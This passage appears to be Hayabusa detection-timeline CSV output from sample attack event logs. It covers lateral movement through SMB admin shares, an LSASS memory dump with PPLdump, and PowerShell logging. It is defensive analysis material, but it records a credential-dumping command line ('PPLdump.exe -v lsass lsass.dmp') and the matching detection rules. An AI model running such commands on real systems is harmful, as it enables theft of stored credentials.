0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.108 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB 
exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.108 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.108 +00:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 
0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.124 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.140 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.179 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.195 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.211 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.211 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 
10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:36.211 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,high,,Windows Hacktool Imphash,,rules/sigma/process_creation_sysmon/proc_creation_win_hacktool_imphashes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.389 +00:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.417 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.418 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:25.427 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.081 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 
747F3D96-F416-6081-0000-001033034A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.081 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.081 +00:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.083 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.084 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 
747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,rules/sigma/file_event/file_event_win_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/proc_access_win_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.163 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 
747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:26.307 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\PPLdump.exe | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:27.649 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 424 | Src PGUID: 747F3D96-6E19-6082-0000-0010A5530000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:27.653 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 6972 | Tgt PGUID: 747F3D96-F417-6081-0000-0010661D4A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.260 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\lsass.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 652 | Src PGUID: 747F3D96-6E19-6082-0000-001070650000 | Tgt PID: 624 | Tgt PGUID: 
747F3D96-6E19-6082-0000-0010F6600000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 6644 | PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-22 22:09:35.284 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 624 | Src PGUID: 747F3D96-6E19-6082-0000-0010F6600000 | Tgt PID: 6644 | Tgt PGUID: 747F3D96-F41F-6081-0000-001078834A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 10:09:29.667 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. 
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.671 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."" CommandInvocation(Get-Command): ""Get-Command""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.674 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.677 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.684 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): 
""PSConsoleHostReadline""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.684 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,>,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.757 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.758 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.761 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH 
firewall rule activation.evtx +2021-04-23 10:09:29.762 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.762 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.762 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.763 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.763 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" 
ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.764 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,":String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException """,rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:29.768 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails 